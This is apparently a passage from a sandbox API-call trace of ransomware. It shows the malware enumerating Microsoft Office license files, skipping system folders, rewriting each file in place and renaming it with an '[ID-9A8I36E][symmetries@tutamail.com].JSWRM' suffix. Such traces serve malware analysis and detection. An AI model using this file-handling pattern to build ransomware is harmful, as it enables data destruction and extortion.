[0106.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalR_Trial-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241128, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0106.946] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0106.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.946] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0106.946] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.947] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11601) returned 1 [0106.947] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.947] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0106.947] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0106.949] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.949] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0106.949] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.949] CloseHandle (hObject=0x45c) returned 1 [0106.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0106.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.949] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0106.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0106.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0106.950] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0106.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0106.950] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.950] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PersonalR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\personalr_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0106.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0106.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0106.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0106.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0106.951] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2910498, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2910498, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe29a8e16, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x902bb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0106.951] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2=".") returned 1 [0106.951] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="..") returned 1 [0106.951] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="...") returned 1 [0106.951] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="windows") returned -1 [0106.951] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="recovery") returned -1 [0106.951] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="perflogs") returned 1 [0106.951] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="documents and settings") returned 1 [0106.951] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.951] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="system volume information") returned -1 [0106.951] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="msocache") returned 1 [0106.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0106.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0106.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0106.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=24, lpMultiByteStr=0x240f48, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pkeyconfig-office.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0106.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0106.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0106.951] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0106.951] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig-office.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2410d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pkeyconfig-office.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0106.951] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0106.952] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0106.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0106.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.952] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=590523) returned 1 [0106.952] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.952] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0106.952] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0106.967] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.967] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0106.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.968] CloseHandle (hObject=0x45c) returned 1 [0106.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0106.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0106.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0106.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0106.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0106.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0106.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.968] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\pkeyconfig-office.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\pkeyconfig-office.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0106.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0106.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0106.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0106.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0106.969] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe83113f2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe83113f2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe83f61d3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x512b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointR_Grace-ppd.xrm-ms", cAlternateFileName="POWERP~2.XRM")) returned 1 [0106.969] lstrcmpiW (lpString1="PowerPointR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0106.969] lstrcmpiW (lpString1="PowerPointR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0106.969] lstrcmpiW (lpString1="PowerPointR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0106.969] lstrcmpiW (lpString1="PowerPointR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0106.969] lstrcmpiW (lpString1="PowerPointR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.969] lstrcmpiW (lpString1="PowerPointR_Grace-ppd.xrm-ms", lpString2="perflogs") returned 1 [0106.969] lstrcmpiW (lpString1="PowerPointR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.969] lstrcmpiW (lpString1="PowerPointR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.969] lstrcmpiW (lpString1="PowerPointR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.970] lstrcmpiW (lpString1="PowerPointR_Grace-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Grace-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0106.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Grace-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240f48, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Grace-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0106.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0106.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Grace-ppd.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240fe8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0106.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.982] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0106.982] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0106.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0106.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.983] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20779) returned 1 [0106.983] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.983] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5120) returned 0x24c1d0 [0106.983] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5120, lpOverlapped=0x0) returned 1 [0106.987] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.987] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5120, lpOverlapped=0x0) returned 1 [0106.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.987] CloseHandle (hObject=0x45c) returned 1 [0106.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0106.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0106.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0106.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0106.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0106.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0106.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.988] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\PowerPointR_Grace-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\powerpointr_grace-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0106.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0106.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0106.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0106.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0106.989] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe82eb133, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe82eb133, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe83cff6e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d5e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="PowerPointR_Grace-ul-oob.xrm-ms", cAlternateFileName="POWERP~1.XRM")) returned 1 [0106.989] lstrcmpiW (lpString1="PowerPointR_Grace-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.989] lstrcmpiW (lpString1="PowerPointR_Grace-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.989] lstrcmpiW (lpString1="PowerPointR_Grace-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.989] lstrcmpiW (lpString1="PowerPointR_Grace-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.989] lstrcmpiW (lpString1="PowerPointR_Grace-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.989] lstrcmpiW (lpString1="PowerPointR_Grace-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0106.989] lstrcmpiW (lpString1="PowerPointR_Grace-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.989] lstrcmpiW (lpString1="PowerPointR_Grace-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.989] lstrcmpiW (lpString1="PowerPointR_Grace-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.989] lstrcmpiW (lpString1="PowerPointR_Grace-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Grace-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0106.989] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPointR_Grace-ul-oob.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPointR_Grace-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0106.989] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.989] RtlAllocateHeap 